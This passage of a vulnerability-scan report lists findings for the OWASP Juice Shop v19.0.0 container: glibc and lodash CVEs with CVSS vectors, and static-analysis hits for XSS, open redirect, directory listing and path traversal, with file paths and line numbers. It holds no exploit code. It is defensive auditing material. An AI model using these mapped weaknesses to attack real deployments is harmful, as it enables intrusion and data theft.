SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 617 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

glibc: glibc: Denial of Service via iconv() function with specific character sets
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The iconv() function in the GNU C Library versions 2.43 and earlier +may crash due to an assertion failure when converting inputs from the +IBM1390 or IBM1399 character sets, which may be used to remotely crash +an application.

+

This vulnerability can be trivially mitigated by removing the IBM1390 + and IBM1399 character sets from systems that do not need them.

+ + + + + + +
Impact
+

fix_deferred

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4046
+https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-4046
+https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/
+https://sourceware.org/bugzilla/show_bug.cgi?id=33980
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD
+https://www.cve.org/CVERecord?id=CVE-2026-4046

+ + + + + + + +
+
+
+
+ Finding 34: CVE-2026-4437 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 125 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

+ + +
Description
+

glibc: glibc: Incorrect DNS response parsing via crafted DNS server response
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling gethostbyaddr or gethostbyaddr_r with a configured +nsswitch.conf that specifies the library's DNS backend in the GNU C +Library version 2.34 to version 2.43 could, with a crafted response from + the configured DNS server, result in a violation of the DNS +specification that causes the application to treat a non-answer section +of the DNS response as a valid answer.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4437
+https://nvd.nist.gov/vuln/detail/CVE-2026-4437
+https://sourceware.org/bugzilla/show_bug.cgi?id=34014
+https://www.cve.org/CVERecord?id=CVE-2026-4437
+https://www.openwall.com/lists/oss-security/2026/03/23/2

+ + + + + + + +
+
+
+
+ Finding 35: CVE-2026-4438 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 20 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

+ + +
Description
+

glibc: glibc: Invalid DNS hostname returned via gethostbyaddr functions
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling gethostbyaddr or gethostbyaddr_r with a configured +nsswitch.conf that specifies the library's DNS backend in the GNU C +library version 2.34 to version 2.43 could result in an invalid DNS +hostname being returned to the caller in violation of the DNS +specification.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-4438
+https://nvd.nist.gov/vuln/detail/CVE-2026-4438
+https://sourceware.org/bugzilla/show_bug.cgi?id=34015
+https://www.cve.org/CVERecord?id=CVE-2026-4438
+https://www.openwall.com/lists/oss-security/2026/03/23/2

+ + + + + + + +
+
+
+
+ Finding 36: CVE-2026-5435 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H

+ + +
Description
+

glibc: glibc: Out-of-bounds write via TSIG record processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the + GNU C Library version 2.2 and newer fail to enforce the caller-supplied + buffer length, and can result in an out-of-bounds write when printing +TSIG records.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-5435
+https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-5435
+https://sourceware.org/bugzilla/show_bug.cgi?id=34033
+https://www.cve.org/CVERecord?id=CVE-2026-5435

+ + + + + + + +
+
+
+
+ Finding 37: CVE-2026-5450 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 122 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H

+ + +
Description
+

glibc: glibc: Heap Buffer Overflow in scanf with %mc format specifier and large width
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling the scanf family of functions with a %mc (malloc'd character +match) in the GNU C Library version 2.7 to version 2.43 with a format +width specifier with an explicit width greater than 1024 could result in + a one byte heap buffer overflow.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-5450
+https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-5450
+https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997
+https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450
+https://www.cve.org/CVERecord?id=CVE-2026-5450

+ + + + + + + +
+
+
+
+ Finding 38: CVE-2026-5928 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 127 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:H

+ + +
Description
+

glibc: glibc: Information disclosure or denial of service via ungetwc function with specific wide character encodings
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Calling the ungetwc function on a FILE stream with wide characters +encoded in a character set that has overlaps between its single byte and + multi-byte character encodings, in the GNU C Library version 2.43 or +earlier, may result in an attempt to read bytes before an allocated +buffer, potentially resulting in unintentional disclosure of neighboring + data in the heap, or a program crash.

+

A bug in the wide character pushback implementation +(_IO_wdefault_pbackfail in libio/wgenops.c) causes ungetwc() to operate +on the regular character buffer (fp->_IO_read_ptr) instead of the +actual wide-stream read pointer (fp->_wide_data->_IO_read_ptr). +The program crash may happen in cases where fp->_IO_read_ptr is not +initialized and hence points to NULL. The buffer under-read requires a +special situation where the input character encoding is such that there +are overlaps between single byte representations and multibyte +representations in that encoding, resulting in spurious matches. The +spurious match case is not possible in the standard Unicode character +sets.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-5928
+https://nvd.nist.gov/vuln/detail/CVE-2026-5928
+https://sourceware.org/bugzilla/show_bug.cgi?id=33998
+https://www.cve.org/CVERecord?id=CVE-2026-5928

+ + + + + + + +
+
+
+
+ Finding 39: CVE-2026-6238 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 126 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H

+ + +
Description
+

glibc: glibc: Application crash or uninitialized memory read via crafted DNS response
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the + GNU C Library version 2.2 and newer fail to validate the RDATA content +against the RDATA length in a DNS response when processing LOC, CERT, +TKEY or TSIG records, which may allow an attacker to craft a DNS +response, causing a target application to crash or read uninitialized +memory.

+

These functions are for application debugging only and hence not in +the path of code executed by the DNS resolver. Further, they have been +deprecated since version 2.34 and should not be used by any new +applications. Applications should consider porting away from these +interfaces since they may be removed in future versions.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-6238
+https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u
+https://nvd.nist.gov/vuln/detail/CVE-2026-6238
+https://sourceware.org/bugzilla/show_bug.cgi?id=34069
+https://www.cve.org/CVERecord?id=CVE-2026-6238

+ + + + + + + +
+
+
+
+ Finding 20: +javascript.lang.security.audit.unknown-value-with-script-tag.unknown- +value-with-script-tag + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 79 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
58
+ + + + + + + +
File Path
/src/routes/videoHandler.ts
+
+
+
+ + + + + +
Description
+

Result message: + Cannot determine what 'subs' is and it is used with a '<script>' +tag. This could be susceptible to cross-site scripting (XSS). Ensure +'subs' is not externally controlled, or sanitize this data.

+ + + + + + + + + + + + +
References
+

https://www.developsec.com/2017/11/09/xss-in-a-script-tag/
+https://github.com/juice-shop/juice-shop/blob/1ceb8751e986dacd3214a618c37e7411be6bc11a/routes/videoHandler.ts#L68

+ + + + + + + +
+
+
+
+ Finding 17: javascript.express.security.audit.express-open-redirect.express-open-redirect + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 601 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
19
+ + + + + + + +
File Path
/src/routes/redirect.ts
+
+
+
+ + + + + +
Description
+

Result message: The application redirects to a URL specified by user-supplied input query + that is not validated. This could redirect users to malicious +locations. Consider using an allow-list approach to validate URLs, or +warn users they are being redirected to a third-party website.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 24: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
277
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 16: +javascript.express.security.audit.possible-user-input-redirect.unknown- +value-in-redirect + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 601 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
19
+ + + + + + + +
File Path
/src/routes/redirect.ts
+
+
+
+ + + + + +
Description
+

Result message: + It looks like 'toUrl' is read from user input and it is used to as a +redirect. Ensure 'toUrl' is not externally controlled, otherwise this is + an open redirect.

+ + + + + + + + + + + + +
References
+

https://owasp.org/Top10/A01_2021-Broken_Access_Control

+ + + + + + + +
+
+
+
+ Finding 15: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
14
+ + + + + + + +
File Path
/src/routes/quarantineServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 120: CVE-2026-2950 Lodash 2.4.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash2.4.2
+ + + + + + + +
File Path
juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

+ + +
Description
+

lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.18.0

+

Impact:

+

Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the .unset and .omit + functions. The fix for (CVE-2025-13465: +https://github.com/lodash/lodash/security/advisories/GHSA-xxjr- +mmjv-4gpg) only guards against string key members, so an attacker can +bypass the check by passing array-wrapped path segments. This allows +deletion of properties from built-in prototypes such as +Object.prototype, Number.prototype, and String.prototype.

+

The issue permits deletion of prototype properties but does not allow overwriting their original behavior.

+

Patches:

+

This issue is patched in 4.18.0.

+

Workarounds:

+

None. Upgrade to the patched version.

+ + +
Mitigation
+

4.18.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2950
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh
+https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg
+https://nvd.nist.gov/vuln/detail/CVE-2026-2950
+https://www.cve.org/CVERecord?id=CVE-2026-2950

+ + + + + + + +
+
+
+
+ Finding 13: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
14
+ + + + + + + +
File Path
/src/routes/logfileServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 123: CVE-2025-13465 Lodash 4.17.21 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash4.17.21
+ + + + + + + +
File Path
juice-shop/node_modules/lodash/package.json
+
+
+
+ + + + + +
Description
+

lodash: prototype pollution in .unset and .omit functions
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.17.23

+

Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the .unset and .omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.

+

The issue permits deletion of properties but does not allow overwriting their original behavior.

+

This issue is patched on 4.17.23

+ + +
Mitigation
+

4.17.23

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:2452
+https://access.redhat.com/security/cve/CVE-2025-13465
+https://bugzilla.redhat.com/2431740
+https://errata.almalinux.org/9/ALSA-2026-2452.html
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81
+https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg
+https://linux.oracle.com/cve/CVE-2025-13465.html
+https://linux.oracle.com/errata/ELSA-2026-2452.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-13465
+https://www.cve.org/CVERecord?id=CVE-2025-13465

+ + + + + + + +
+
+
+
+ Finding 124: CVE-2026-2950 Lodash 4.17.21 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1321 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
lodash4.17.21
+ + + + + + + +
File Path
juice-shop/node_modules/lodash/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

+ + +
Description
+

lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.18.0

+

Impact:

+

Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the .unset and .omit + functions. The fix for (CVE-2025-13465: +https://github.com/lodash/lodash/security/advisories/GHSA-xxjr- +mmjv-4gpg) only guards against string key members, so an attacker can +bypass the check by passing array-wrapped path segments. This allows +deletion of properties from built-in prototypes such as +Object.prototype, Number.prototype, and String.prototype.

+

The issue permits deletion of prototype properties but does not allow overwriting their original behavior.

+

Patches:

+

This issue is patched in 4.18.0.

+

Workarounds:

+

None. Upgrade to the patched version.

+ + +
Mitigation
+

4.18.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-2950
+https://github.com/lodash/lodash
+https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh
+https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg
+https://nvd.nist.gov/vuln/detail/CVE-2026-2950
+https://www.cve.org/CVERecord?id=CVE-2026-2950

+ + + + + + + +
+
+
+
+ Finding 204: CVE-2024-28863 Tar 4.4.19 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 400 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
tar4.4.19
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

+ + +
Description
+

node-tar: denial of service while parsing a tar file due to lack of folders depth validation
+Target: Node.js
+Type: node-pkg
+Fixed version: 6.2.1

+

node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no + limit on the number of sub-folders created in the folder creation +process. An attacker who generates a large number of sub-folders can +consume memory on the system running node-tar and even crash the Node.js + client within few seconds of running it using a path with too many +sub-folders inside. Version 6.2.1 fixes this issue by preventing +extraction in excessively deep sub-folders.

+ + +
Mitigation
+

6.2.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2024:6147
+https://access.redhat.com/security/cve/CVE-2024-28863
+https://bugzilla.redhat.com/2293200
+https://bugzilla.redhat.com/2296417
+https://bugzilla.redhat.com/show_bug.cgi?id=2293200
+https://bugzilla.redhat.com/show_bug.cgi?id=2296417
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22020
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28863
+https://errata.almalinux.org/9/ALSA-2024-6147.html
+https://errata.rockylinux.org/RLSA-2024:6147
+https://github.com/isaacs/node-tar
+https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7
+https://github.com/isaacs/node-tar/commit/fe8cd57da5686f8695415414bda49206a545f7f7 (v6.2.1)
+https://github.com/isaacs/node-tar/security/advisories/GHSA-f5x3-32g6-xq36
+https://linux.oracle.com/cve/CVE-2024-28863.html
+https://linux.oracle.com/errata/ELSA-2024-6148.html
+https://nvd.nist.gov/vuln/detail/CVE-2024-28863
+https://security.netapp.com/advisory/ntap-20240524-0005
+https://security.netapp.com/advisory/ntap-20240524-0005/
+https://www.cve.org/CVERecord?id=CVE-2024-28863

+ + + + + + + +
+
+
+
+ Finding 23: +javascript.express.security.audit.express-check-directory- +listing.express-check-directory-listing + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 548 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
273
+ + + + + + + +
File Path
/src/server.ts
+
+
+
+ + + + + +
Description
+

Result message: + Directory listing/indexing is enabled, which may lead to disclosure of +sensitive directories and files. It is recommended to disable directory +listing unless it is a public resource. If you need directory listing, +ensure that sensitive files are inaccessible when querying the resource.

+ + + + + + + + + + + + +
References
+

https://www.npmjs.com/package/serve-index
+https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/

+ + + + + + + +
+
+
+
+ Finding 128: CVE-2024-4067 Micromatch 3.1.10 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
micromatch3.1.10
+ + + + + + + +
File Path
juice-shop/node_modules/micromatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

+ + +
Description
+

micromatch: vulnerable to Regular Expression Denial of Service
+Target: Node.js
+Type: node-pkg
+Fixed version: 4.0.8

+

The NPM package micromatch prior to 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in micromatch.braces() in index.js because the pattern .* + will greedily match anything. By passing a malicious payload, the +pattern matching will keep backtracking to the input while it doesn't +find the closing bracket. As the input size increases, the consumption +time will also increase until it causes the application to hang or slow +down. There was a merged fix but further testing shows the issue +persists. This issue should be mitigated by using a safe pattern that +won't start backtracking the regular expression due to greedy matching. +This issue was fixed in version 4.0.8.

+ + +
Mitigation
+

4.0.8

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2024-4067
+https://advisory.checkmarx.net/advisory/CVE-2024-4067
+https://advisory.checkmarx.net/advisory/CVE-2024-4067/
+https://devhub.checkmarx.com/cve-details/CVE-2024-4067
+https://devhub.checkmarx.com/cve-details/CVE-2024-4067/
+https://github.com/micromatch/micromatch
+https://github.com/micromatch/micromatch/blob/2c56a8604b68c1099e7bc0f807ce0865a339747a/index.js#L448
+https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade
+https://github.com/micromatch/micromatch/commit/500d5d6f42f0e8dfa1cb5464c6cb420b1b6aaaa0
+https://github.com/micromatch/micromatch/issues/243
+https://github.com/micromatch/micromatch/pull/247
+https://github.com/micromatch/micromatch/pull/266
+https://github.com/micromatch/micromatch/releases/tag/4.0.8
+https://nvd.nist.gov/vuln/detail/CVE-2024-4067
+https://www.cve.org/CVERecord?id=CVE-2024-4067

+ + + + + + + +
+
+
+
+ Finding 12: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
14
+ + + + + + + +
File Path
/src/routes/keyServer.ts
+
+
+
+ + + + + +
Description
+

Result message: + The application processes user-input, this is passed to res.sendFile +which can allow an attacker to arbitrarily read files on the system +through path traversal. It is recommended to perform input validation in + addition to canonicalizing the path. This allows you to validate the +path against the intended directory it should be accessing.

+ + + + + + + + + + + + +
References
+

https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html

+ + + + + + + +
+
+
+
+ Finding 11: javascript.express.security.audit.express-res-sendfile.express-res-sendfile + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Medium + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 73 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
33
+ + + + + + + +
File Path
/src/routes/fileServer.ts
+
+
+
+ + + + + +
Description
+

